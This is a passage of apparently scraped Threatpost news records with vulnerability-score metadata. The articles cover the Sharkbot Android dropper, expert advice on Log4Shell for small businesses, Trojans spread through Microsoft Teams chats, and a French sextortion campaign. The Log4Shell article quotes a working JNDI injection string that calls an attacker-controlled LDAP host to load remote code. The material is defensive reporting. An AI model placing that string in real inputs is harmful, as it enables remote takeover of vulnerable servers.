said.\n\n\u201cWith DGA, one sample with a hardcoded seed generates seven domains per week,\u201d they wrote. \u201cIncluding all the seeds and algorithms we have observed, there is a total of 56 domains per week, i.e., 8 different combinations of seed/algorithm.\u201d\n\nResearchers observed 27 versions of Sharkbot in their research; the main difference between versions was different DGA seeds as well as different botnetID and ownerID fields, they said.\n\nAll in all, Sharkbot implements 22 commands that allow various malicious actions to be executed on a user\u2019s Android device, including: requesting permission for sending SMS messages; uninstalling a given applications; sending the device\u2019s contact list to a server; disabling battery optimization so Sharkbot can run in the background; and imitating the user\u2019s swipe over the screen.\n\n## **Timeline of Activity**\n\nResearchers first discovered four applications of the Sharkbot Dropper on Google Play on Feb. 25 and shortly thereafter reported their findings to Google on March 3. Google removed the applications on March 9 but then another Sharkbot dropper was discovered six days later, on March 15.\n\nCPR reported the third dropper discovered immediately and then found two more Sharkbot droppers on March 22 and March 27 that they also reported quickly to Google for removal.\n\nThe droppers by which Sharkbot spreads in and of themselves should raise concern, researchers said. \u201cAs we can judge by the functionality of the droppers, their possibilities clearly pose a threat by themselves, beyond just dropping the malware,\u201d they wrote in the report.\n\nSpecifically, researchers found the Sharkbot dropper masquerading as the following applications on Google Play;\n\n * com.abbondioendrizzi.tools[.]supercleaner\n * com.abbondioendrizzi.antivirus.supercleaner\n * com.pagnotto28.sellsourcecode.alpha\n * com.pagnotto28.sellsourcecode.supercleaner\n * com.antivirus.centersecurity.freeforall\n * com.centersecurity.android.cleaner\n\nThe droppers also have a few of their own evasion tactics, such as detecting emulators and quitting if one is found, researchers noted. They also are able to inspect and act on all the UI events of the device as well as replace notifications sent by other applications.\n\n\u201cIn addition, they can install an APK downloaded from the CnC, which provides a convenient starting point to spread the malware as soon as the user installs such an application on the device,\u201d researchers added.\n\n## **Google Play Under Fire**\n\nGoogle has [long struggled](<https://threatpost.com/google-play-malware-spy-trojans/164601/>) with the persistence of malicious applications and [malware](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>) on its Android app store and has made significant efforts to clean up its act.\n\nHowever, the emergence of Sharkbot disguised as AV solutions shows that attackers are getting sneakier in how they hide their malicious activity on the platform, and could serve to damage users\u2019 confidence in Google Play, noted a security professional.\n\n\u201cMalware apps that conceal their malicious functionality with time delays, code obfuscation and geofencing can be challenging to detect during the app review process, but the regularity that they are discovered lurking in official app stores really damages user trust in the safety of all apps on the platform,\u201d observed Chris Clements, vice president of solutions architecture at security firm [Cerberus Sentinel](<https://www.cerberussentinel.com/>), in an email to Threatpost**.**\n\nWith the smartphone at the center of people\u2019s digital lives and actins as a hub of financial, personal and work activity, \u201cany malware that compromises the security of such a central device can do significant financial or reputational damage,\u201d he added.\n\nAnother security professional urged caution to Android users when deciding whether or not to download a mobile app from a reputable vendor\u2019s store, even if it\u2019s a trusted brand.\n\n\u201cWhen installing apps from various technology stores, it is best to research the app before downloading it,\u201d observed James McQuiggan, security awareness advocate at [KnowBe4](<http://www.knowbe4.com/>). **\u201c**Cybercriminals love to trick users into installing malicious apps with hidden functionalities in an attempt to steal data or take over accounts.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-08T16:06:29", "type": "threatpost", "title": "Google Play Bitten by Sharkbot Info-stealer \u2018AV Solution\u2019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-08T16:06:29", "id": "THREATPOST:48A631F2D45804C677BB672F838F29DA", "href": "https://threatpost.com/google-play-bitten-sharkbot/179252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T20:32:17", "description": "News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an \u201cinternet meltdown,\u201d as well as the \u201cworst cybersecurity bug of the year.\u201d Names like \u201cApple,\u201d \u201cTwitter\u201d and \u201cCloudflare\u201d are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?\n\nWe asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs in a set of roundtable questions, aimed at demystifying the firehose of information around the headline-grabbing issue.\n\nIt may seem overwhelming for smaller companies. But our experts, from Anchore, Cybereason, Datto, ESET, HackerOne, Invicti Security, Lacework and Mitiga, have weighed in here with exclusive, practical advice and explanations specifically for SMBs dealing with Log4Shell.\n\n_\u201cWiz research shows that more than 89 percent of all environments have vulnerable log4j libraries. And in many of them, the dev teams are sure they have zero exposure \u2014 and are surprised to find out that some third-party component is actually built using Java.\u201d \u2014 Ami Luttwak, __co-founder and CTO at Wiz, which has seen its usage double as a result of Log4Shell (via email to Threatpo__st)._\n\n_**Questions answered (click to jump to the appropriate section):**_\n\n * What bad Log4Shell outcomes are possible for SMBs?\n * How is a real-world Log4Shell attack carried out?\n * How can SMBs prepare for Log4Shell without a dedicated security team?\n * What happens if an SMB uses an MSP?\n * What applications should SMBs worry about being attacked?\n * How can SMBs remediate a Log4Shell attack?\n * Final thoughts\n\n## Background on Log4Shell\n\nLog4Shell ([CVE-2021-44228](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)) affects applications that rely on the log4j library to log data. Because that library is almost ubiquitous in Java applications, virtually any business that has a website is highly likely to be affected. With one line of malicious code, attackers are able to execute malware or commands on a target application and take over the server that houses it.\n\nFrom there, an attacker can carry out any number of further attacks.\n\n\u201cSmall businesses are at significant risk because plenty of the software they rely on may be vulnerable, and they do not have the resources to patch quickly enough,\u201d Ofer Maor, Mitiga CTO, told Threatpost.\n\nSMBs also tend to rely on third-party software suppliers and managed service providers (MSPs) for their technology infrastructure, which reduces cost and reduces the need for dedicated IT staff. However, this unfortunately puts SMBs at even worse risk, because they need to rely on their third-party vendors to patch and respond in many cases.\n\nThe bug was first disclosed as a zero-day vulnerability last week, but an emergency fix has been rolled out that now must be incorporated by the many developers who use log4j in their applications. The steps to address Log4Shell for SMBs thus include identifying potentially affected applications (including those provided by MSPs), confirming the vulnerability\u2019s impact within them, and applying or confirming updates as soon as possible. SMBs will also need to determine whether they\u2019re already compromised and remediate the issue if so.\n\nAll of this should take priority since [a slew of attacks is imminent](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), thanks to an exploit becoming publicly available online, researchers noted.\n\n\u201cNumerous attack groups are already [actively exploiting](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) this vulnerability, mostly through automated scripts,\u201d Maor warned. \u201cThis means we expect to see this being exploited in masses, hitting tens of thousands or even more targets.\u201d\n\n## What Bad Log4Shell Outcomes Are Possible for SMBs?\n\n**Ofer Maor, Mitiga CTO:** One of the concerns is that a lot of these attacks now will focus on getting initial access only and establishing persistence (that is, installing something that will allow the attacker to have access to their systems later, even after the vulnerability has been fixed).\n\n**Marc-\u00c9tienne L\u00e9veill\u00e9, malware researcher for ESET:** SMBs providing online services may expose their system to malware and data exfiltration if their systems use the log4j software to log events. The risk is quite high, given the exploit is available online and relatively easy to trigger. Once into the network, cybercriminals could pivot to gain access to additional resources.\n\n**Josh Bressers, vice president of security at Anchore:** This vulnerability allows attackers to run the code of their choosing, such as a cryptominer, a backdoor or data-stealing malware, for example. One of the challenges for a vulnerability like this is the attacker landscape is changing rapidly. So far, most of the attacks seem to be using compute resources to mine cryptocurrency, but these attacks are changing and evolving each hour. It is expected that the attacks will gain in sophistication over the coming days and weeks.\n\n**Mark Nunnikhoven, distinguished cloud strategist at Lacework:** Unfortunately\u2026an attacker can take over your system or steal your data quite easily using this vulnerability.\n\n**Pieter Ockers, senior director of technical services at HackerOne: **In a more devastating case, criminals that gain initial access to the victim\u2019s environment could auction that access off to crews that specialize in executing ransomware attacks. SMBs should be hyper-aware of any of their software vendors/MSPs that use Apache log4j in case they are affected by a breach; I suspect we might hear of some ransomware attacks soon stemming from this vulnerability.\n\n## How Is a Real-World Log4Shell Attack Carried Out?\n\n**Cybereason CTO Yonatan Striem-Amit**: The most prevalent attack scenarios we\u2019ve seen are abusing things like the user agent or things like a log-in screen. If an application has a log-in page where a user is asked to put his username and password (and a lot of them do), an attacker could just supply the malicious string within that user field and get code execution on that server. After that he essentially controls logins, and therefore can start doing whatever he wants on that server, including, of course, eavesdropping into every other user who\u2019s logging in to the environment with their password.\n\n**Adam Goodman, vice president of product management at Invicti Security: **This attack is astonishingly easy to execute. This is because it may not require authentication to execute, nor would it require penetrating multiple application and/or networking layers to begin the exploit. It\u2019s simply a text string sent to any places that will be logged. And finding such a place is very easy \u2013 it can be a simple header, or a simple text field or error condition sent to a log file.\n\nTo exploit Log4Shell, the attacker may use any user input subsequently logged by the log4j framework. For example, in the case of a web application, it may be any text entry field or HTTP header such as User-Agent. Server logging is often set to log headers as well as form data.\n\nThe attacker only needs to include the following string in the logged user input:\n\n${jndi:ldap://attacker.com/executeme}\n\nWhere attacker.com is a server controlled by the attacker and executeme is the Java class to be executed on the victim server. And this is just one of many ways to exploit this vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cA real world-attack can be as simple as the attack sending a specifically crafted web request to a vulnerable server. When the server processes that request, the attacker then has access to the server. The Lacework Labs team has documented this attack and some other technical aspects of attacks we\u2019ve seen in[ this blog post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>).\u201d\n\n**Anchore\u2019s Bressers: **Attackers send requests to vulnerable applications, this triggers the vulnerability. The application then downloads a cryptocurrency mining application, in one scenario, and runs it on the compromised system. The cryptomining application then consumes large amounts of victim\u2019s processing power while the attacker claims the cryptomining rewards.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png>)\n\nTrend Micro published this attack-scenario flow on Tuesday (https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review).\n\n## How Can SMBs Address Log4Shell without a Dedicated Security Team?\n\n**HackerOne\u2019s Ockers: **These kinds of wide sweeping cyberattacks will always be a bigger challenge for those that lack a dedicated security team. If only one or two individuals in IT are working to monitor security, it\u2019s even more important you\u2019re prepared and have already taken stock of the software you\u2019re using and your vendor\u2019s software. Once you gain that visibility, I recommend patching any instances you find of log4j and updating the software to version 2.15.0 in your own software. I\u2019d also confirm any vendors\u2019 exposure and incident management around log4j patching and response.\n\n_According to __[Microsoft\u2019s recent blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)__, the log4j 2 library is included in widely deployed Apache products including Struts 2, Solr, Druid, Flink and Swift. SMBs that have built applications with these products should conduct a code audit to determine if the vulnerable version of log4j is in use._\n\n**Mitiga\u2019s Maor:** SMBs should set up an immediate task force to map all affected homegrown systems and patch them, while allowing IT to map all external systems and communicate with the censored systems.\n\n**Anchore\u2019s Bressers: **This vulnerability is going to be especially challenging for small and medium business users without a dedicated security team. Ideally software vendors are being proactive in their investigations and updates and are contacting affected customers, but this is not always the case.\n\nDepending on the level of technical acumen an organization has, there are steps that can be taken to detect and resolve the issue themselves. There are various open-source tools that exist to help detect this vulnerability on systems such as [Syft and Grype](<https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html>). CISA has [released guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) regarding this vulnerability, including steps a business can take.\n\n**Lacework\u2019s Nunnikhoven: **\u201cWhile IT knowledge is required, the basic steps don\u2019t require a security team. IT teams should be trying to find systems that use log4j in their environment and then apply one of the techniques the fantastic team of volunteers with the log4j project have published or the recommended guidance from that system\u2019s vendors. This is a lot of work but it\u2019s necessary to reduce the risk to your business.\n\n_The log4j team\u2019s resource is __[available here](<https://logging.apache.org/log4j/2.x/security.html>), in the mitigation section under the \u201cFixed in Log4j 2.15.0\u201d heading._ _Many organizations have also published free tools to help identify vulnerable applications, [like this one](<https://about.sourcegraph.com/blog/log4j-log4shell-0-day/>), [this one](<https://log4j-tester.trendmicro.com/>) or [this one](<https://github.com/hillu/local-log4j-vuln-scanner>)._\n\n**Invicti\u2019s Adam Goodman: **It\u2019s a nightmare of a problem if you have a surplus of Java applications deployed everywhere, not just on the primary website. Organizations should immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.\n\nAim to ensure that all applications have limited outbound internet connectivity, and use Ansible scripts or adequate security tools to scan _en masse_ for the vulnerability before forcibly patching it. It\u2019s crucial to use security tools that target all of the applications they can find so that organizations have a more accurate window into their security posture.\n\nOrganizations that lack sufficient budget to invest in discovery tools should make a list of Java applications which they add to continually, and check them off, while prioritizing apps that present the most risk if exploited.\n\n## What Happens if an SMB Uses an MSP?\n\n**Anchore\u2019s Bressers: **I would expect an MSP to take the lead on this issue for their customers. An MSP should be monitoring their infrastructure for indicators of compromise, applying workarounds when possible, and updating the managed applications as vendor updates become available. Any business using MSP services should reach out to their provider and request a status update on the Log4Shell.\n\n**Ryan Weeks, CISO at Datto:** \u201cCyber-threats are always prevalent. Especially for small to medium-sized businesses (SMBs) \u2013 [78 percent](<https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report>) of MSPs reported attacks against their client SMBs in the last two years alone. MSPs have a responsibility to diligently check for vulnerabilities and arm their customers with the tools to combat them. It\u2019s not enough to simply install routine software updates. SMBs need to ensure their partners proactively push out security updates for any affected products, and continually monitor for potential exploits.\n\n**Invicti\u2019s Adam Goodman: **This is an issue front-and-center in the security community and if an organization is using an MSP, it\u2019s highly likely that MSP is actively working on this. Confirm that a ticket and incident is open for this vulnerability, and ask the MSP for a list of managed applications that are under remediation. It\u2019s vital to review that list of apps for anything that\u2019s missing, including any back-office or forgotten tools in the mix. Ensure the MSP has visibility into the attack surface so that you both can better handle necessary containment steps moving forward.\n\n**Lacework\u2019s Nunnikhoven: **A managed service provider can help update and fix the systems they manage. A managed security service provider can help detect and stop attacks aimed at this issue, and help investigate any attacks that may have already taken place. The first step in both cases is speaking with your MSP/MSSP to understand the steps they are taking to help protect their customers.\n\n## What Applications Should SMBs Worry About?\n\n**Mitiga\u2019s Maor:** Impact can vary significantly as many custom-developed and off-the-shelf products are impacted. Many adversaries are using the vulnerability as part of mass-scanning efforts to identify vulnerable systems. Likewise, some known malware strains have already incorporated exploitation of this vulnerability into their spreading mechanisms. Any Java application might be affected.\n\n**Invicti\u2019s Adam Goodman: **SMBs should address worries and concerns based on business risk. Internet-facing apps should receive immediate priority, followed by applications that are critical to the software supply chain or back-office and financial applications. There is also an excellent effort from the security community to compile all affected technologies, [it can be found here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>).\u201d\n\n**ESET\u2019s L\u00e9veill\u00e9: **As a first step, SMBs should ask questions of the organization providing their internet-facing services such as their website. Then they should see if any of their applications use log4j to generate logs. Java applications and webservices would be the first to look at because log4j is a Java library.\n\n**Cybereason\u2019s Striem-Amit:** The world of Java and open source has so many dependencies, where a company might use one product, but it actually carries with it a dozen other libraries. So log4j could be present even though a company might not necessarily even be aware or \u2026 done it directly. So the scanning and the analysis is severely complex. And you have to go in each one of your servers and see, are we using log4j either directly or indirectly in that environment.\n\n## How Can SMBs Remediate a Successful Log4Shell Attack?\n\n**Mitiga\u2019s Maor:** Thankfully, there\u2019s a lot that can be done to harden environments. For customers with internally developed applications, limiting outbound internet connections from servers to only whitelisted hosts is a great step, if challenging to implement. Likewise, a variety of cybersecurity companies have listed steps that can be taken to harden vulnerable versions of log4j if upgrades can\u2019t be performed readily. Similarly, exploitation of this vulnerability and many others can be caught using typical compromise assessment techniques. It pays to threat hunt! Remediation is no different than recovering from any other type of RCE vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cRemediation of this issue will depend on where you find log4j. If it\u2019s in something you\u2019ve written, you can update the library or turn off the vulnerable feature. For commercial software and services, you\u2019re reliant on the vendor to resolve the issue. While that work is ongoing, monitoring your network to attack attempts is reasonably straightforward\u2026if you have the security controls in place.\n\nLacework Labs has published[ a detailed technical post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) on some of the attack techniques currently in use. Expect more variants as cybercriminals develop more techniques to avoid various security controls and other mitigation.\n\nIn situations like this it\u2019s important to understand that until the root cause has been resolved (log4j updated or the feature in question turned off), attackers will continue to work to evade any mitigations that defenders put in place to stop them.\n\n**Anchore\u2019s Bressers: **An organization without an incident-management team on staff should reach out to an incident-management consulting group. There are a number of important steps that should happen when investigating any cybersecurity attack, successful or not, that can require preserving evidence, recovering data, and protecting employees and users. This is a serious vulnerability with serious consequences. It\u2019s one of the worst we have seen in recent history because of its ease of exploitability, far-reaching impacts and powerful nature.\n\n## Final Thoughts\n\n**Datto\u2019s Weeks:** Scenarios such as the log4j vulnerability underscore the importance of proactivity in security. While many are now scrambling to address the vulnerability with patches, it\u2019s equally more important to plan for subsequent attacks. Fortunately, there are solutions that can apply known workarounds for vulnerable instances.\n\n**HackerOne\u2019s Ockers: **As a best practice, I recommend all businesses have a clear understanding of the software used within their own systems. Even more important for SMBs in this instance \u2014 businesses should also have a clear understanding of the licensing agreements and security policies of any software vendors or service providers. This level of visibility lets security and IT teams quickly understand where they\u2019re at risk if, and when, something like this is exploited.\n\n**ESET\u2019s L\u00e9veill\u00e9: **SMBs should verify if there were any successful attempts to exploit the vulnerability by looking at their logs.\n\n**HackerOne\u2019s Ockers: **SMBs and larger organizations alike will be affected. As we\u2019re seeing, exploitation will continue to be widespread \u2013 this means it\u2019s particularly important that SMBs check if vendors are still using the vulnerable version of log4j to process user-controlled or otherwise untrusted data. And, if so, SMBs should also ask vendors if their data is stored or processed in the same exposed environment.\n\n**Cybereason\u2019s Striem-Amit:** I think at the end of the day, really prioritize the most internet-facing environments, and rely on your service providers as much as they can to assist you with other patching. You\u2019re welcome to use [our vaccine](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) to buy time. It does work remarkably well to make sure that, between now and when you actually end up patching the server, you\u2019re kind of secure.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, features security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T17:54:47", "type": "threatpost", "title": "What the Log4Shell Bug Means for SMBs: Experts Weigh In", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T17:54:47", "id": "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "href": "https://threatpost.com/log4shell-bug-smbs-experts/177021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:44", "description": "Threat actors are targeting Microsoft Teams users by planting malicious documents in chat threads that execute Trojans that ultimately can take over end-user machines, researchers have found.\n\nIn January, researchers at Avanan, a Check Point Company, began tracking the campaign, which drops malicious executable files in Teams conversations that, when clicked on, eventually take over the user\u2019s computer, according to [a report](<https://www.avanan.com/blog/hackers-attach-malicious-.exe-files-to-teams-conversations>) published Thursday.\n\n\u201cUsing an executable file, or a file that contains instructions for the system to execute, hackers can install DLL files and allow the program to self-administer and take control over the computer,\u201d cybersecurity researcher and analyst at Avanan Jeremy Fuchs wrote in a report. \u201cBy attaching the file to a Teams attack, hackers have found a new way to easily target millions of users.\u201d\n\n[![Webinar Promo](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/18102902/keeper_1500x1500-300x300.jpg)](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nCybercriminals long have targeted Microsoft\u2019s ubiquitous document-creation and sharing suite \u2013 the legacy Office and its cloud-based version, [Office 365](<https://threatpost.com/tiny-font-size-email-filters-bec-phishing/176198/>) \u2013 with attacks against individual apps in the suite such as [PowerPoint](<https://threatpost.com/powerpoint-abused-take-over-computers/178182/>) as well as [business email compromise](<https://threatpost.com/microsoft-365-bec-innovation/163508/>) and other scams.\n\nNow Microsoft Teams \u2013 a business communication and collaboration suite \u2013 is emerging as an [increasingly popular attack surface](<https://threatpost.com/microsoft-teams-phishing-office-365/160458/>) for cybercriminals, Fuchs said.\n\nThis interest could be attributed to its surge in use over the COVID-19 pandemic, as many organization\u2019s employees working remotely relied on the app to collaborate. Indeed, the number of daily active users of Teams [nearly doubled](<blank>) over the past year, increasing from 75 million users in April 2020 to 145 million as of the second quarter of 2021, according to Statista.\n\nThe latest campaign against Teams demonstrates an increased understanding of the collaboration app that will allow attacks against it to increase in both sophistication and volume, Fuchs noted. \u201cAs Teams usage continues to increase, Avanan expects a significant increase in these sorts of attacks,\u201d he wrote.\n\n## **Taking on Teams**** **\n\nIn order to plant malicious documents in Teams, researchers first have to get access to the application, Fuchs noted. This is possible in a number of ways, typically involving an initial [email compromise](<https://threatpost.com/microsoft-teams-tabs-bec/166909/>) through phishing to gain credentials or other access to a network, he said.\n\n\u201cThey can compromise a partner organization and listen in on inter-organizational chats,\u201d Fuchs wrote. \u201cThey can compromise an email address and use that to access Teams. They can steal Microsoft 365 credentials, giving them carte blanche access to Teams and the rest of the Office suite.\u201d\n\nOnce an attacker gains access to Teams, it\u2019s fairly easy to navigate and slip past any security protections, he noted. This is because \u201cdefault Teams protections are lacking, as scanning for malicious links and files is limited,\u201d and \u201cmany email security solutions do not offer robust protection for Teams,\u201d Fuchs wrote.\n\nAnother reason Teams is easy for hackers to compromise is that end users inherently trust the platform, sharing sensitive and even confidential data with abandon while using it, he said.\n\n\u201cFor example, an Avanan analysis of hospitals that use Teams found that doctors share patient medical information practically with no limits on the Teams platform,\u201d Fuchs wrote. \u201cMedical staff generally know the security rules and risk of sharing information via email, but ignore those when it comes to Teams. In their mind, everything can be sent on Teams.\u201d\n\nFurther, nearly every Teams user can invite people from other departments or other companies to collaborate via the platform, and there is often \u201cminimal oversight\u201d over these requests because of the trust people have, he added.\n\n## **Specific Attack Vector**\n\nIn the attack vector Avanan researchers observed, attackers first access Teams through one of the aforementioned ways, such as a phishing email that spoofs a user, or through a lateral attack on the network.\n\nThen, the threat actor attaches a .exe file to a chat \u2013 called \u201cUser Centric\u201d \u2013 that is actually a trojan. To the end user, it looks legitimate, because it appears to be coming from a trusted user.\n\n\u201cWhen someone attaches a file to a Teams chat, particularly with the innocuous-sounding file name of \u2018User Centric,\u2019 many users won\u2019t think twice and will click on it,\u201d Fuchs wrote.\n\nIf that happens, the executable will then install DLL files that install malware as a Windows program and create shortcut links to self-administer on the victim\u2019s machine, he said. The ultimate goal of the malware is to take over control of the machine and perform other nefarious activities.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T14:11:48", "type": "threatpost", "title": "Microsoft Teams Targeted With Takeover Trojans", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T14:11:48", "id": "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "href": "https://threatpost.com/microsoft-teams-targeted-takeover-trojans/178497/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T17:30:25", "description": "A new French-language [sextortion campaign](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>) is making the rounds, researchers warn.\n\nAs noted by Sophos researchers in a Monday [report](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>), sextortion is one of the oldest tricks in the book, but its popularity has waned in recent years due to effective cybersecurity, law enforcement crackdowns and the rise of ransomware.\n\nThis new campaign is one signal of what may be a resurgence, they said.\n\n[![Webinar Promo](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/18102902/keeper_1500x1500-300x300.jpg)](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n## Threats Sandwich Malware Links\n\nThe new French-language attack entails a blind email blast, shown below, with unsubstantiated claims of video evidence and so on. It cites France\u2019s legal penalties for watching illegal pornography, then tells the reader: \u201cIf you wish, you may reply to the address below to explain away your actions, so that we can evaluate your explanation and determine if charges should be brought. You have a strict deadline of 72 hours.\u201d\n\nShould the reader not comply, \u201cwe will are [sic] obliged to send our report to the Public Prosecutor to issue an arrest warrant against you. We will proceed to have you arrested by the police closest to your place of residence.\u201d\n\nNotably, the malicious email contains no plaintext or hyperlinks. Instead, its text is displayed in an image file.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/23114449/French-sextortion-threat-email-218x300.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/23114449/French-sextortion-threat-email-e1645634734663.png>)\n\nFrench-language sextortion threat email. Source: Sophos.\n\nAttackers use hyperlinks to trick unwitting victims into downloading malware or visiting malicious webpages. As Sophos explains, \u201cAdding an image that holds the call-to-action text obviously makes it harder for a recipient to reply, because a plain image can\u2019t contain clickable links, or even text that can be copied and pasted.\u201d\n\nBut, as Mike Parkin \u2013 senior technical engineer at Vulcan Cyber \u2013 told Threatpost via email, \u201cThe fact that most scams end up in our junk mail folder shows how effective email filters have become, which is why they look to alternative methods like embedded PDFs or images rather than raw text or HTML that is easy for the filters to analyze.\u201d\n\n## What is Sextortion?\n\nSextortion is a form of blackmail in which a malicious actor claims to possess evidence of sexual misbehavior from their victim. The attacker demands payment in exchange for not spreading the compromising information or images.\n\nSometimes, these campaigns can combine with [botnets](<https://threatpost.com/phorpiex-botnet-shifts-ransomware-sextortion/149295/>), [ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>) and other methods of cyber attack to form a potent cocktail. However, as [prior](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) [attacks](<https://threatpost.com/sextortionists-defenses-cryptocurrency-shift/148967/>) have shown, sextortion tends to be rudimentary: Such attacks aren\u2019t targeted. Rather, they entail blind email blasts that prey on victims\u2019 fear, without any actual evidence of sexual impropriety to back them up.\n\n## Sextortion is on the Rise Again\n\n\u201cScams seem to run in cycles,\u201d notes Parkin. \u201cWhether it\u2019s a Prince from Nigeria, uncollected assets, scam victim compensation, extortion over adult websites you didn\u2019t visit, or whatever. Scammers will use one for a while, then shift to something else when they stop getting responses. Eventually, they\u2019ll circle back to an old scam that may have been updated with new text or a new graphic.\u201d\n\nLionel Sigal, CTI at CYE, told Threatpost via email that sextortion has recently been skyrocketing; \u201cSextortion attempts (real and fake) targeting executives of organizations have increased by 